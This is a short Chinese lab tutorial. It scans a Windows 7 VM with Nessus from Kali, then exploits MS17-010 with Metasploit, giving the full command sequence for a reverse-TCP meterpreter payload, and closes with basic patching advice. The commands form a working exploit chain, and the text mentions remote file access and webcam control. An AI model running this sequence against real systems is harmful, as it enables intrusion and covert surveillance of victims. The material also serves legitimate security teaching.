安全攻防系列2-服务器漏洞安全

Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件，提供完整的电脑漏洞扫描服务, 并随时更新其漏洞数据库。可以配置不同的扫描方案及插件。但在中国网络环境很多网民并没有修补漏洞的习惯，或者使用很多过时的系统或软件，存在较大的安全风险，本文主要介绍kali linux nessus软件的漏洞扫描，并利用windows操作系统的漏洞ms17-010进行攻击演示，本文仅用于个人研究服务器安全，请勿用于非法用途，后果自负。

1、打开win7、kali linux设置NAT网卡在相同的网段192.168.188.0

2、开启nessusd服务，kali控制台输入：service nessusd start

3、使用nessusd进行漏洞扫描：访问https://192.168.188.128:8834

创建扫描window任务并开始扫描

4、通过msf平台利用ms17漏洞

进入msf平台：msfconsole

搜索可利用模块：search ms17

使用指定功能：use exploit/windows/smb/ms17-010

显示参数：show options

设置远程主机：set RHOST 192.168.188.130

显示可攻击对象：show targets

设置攻击对象：set TARGET 8

设置注入进程：set PROCESSINJECT spoolsv.exe

显示payloads：show payloads

设置payload：set PAYLOAD windows/meterpreter_reverse_tcp

设置本地主机：set LHOST 192.168.188.128

开始利用：exploit -j

返回了meterpreter则说明注入成功，可以有很多操作可以使用，例如调命令窗口、访问远程主机文件、系统截屏、打开摄像头。。。。。。

本文需要的资料可访问下面链接获取：

链接：https://pan.baidu.com/s/1Aqv6wCM5HRwL_zGfMUrycw

提取码：l51b

防御办法：

1、定期使用漏洞扫描工具进行安全检查。

2、windows更新虽然体验差，但是高危漏洞还是有必要更新的，关闭系统更新的可以使用360软件来进行补丁更新。

3、在各软件发布漏洞后一定记得及时更新补丁程序，不明来源软件不要随意安装。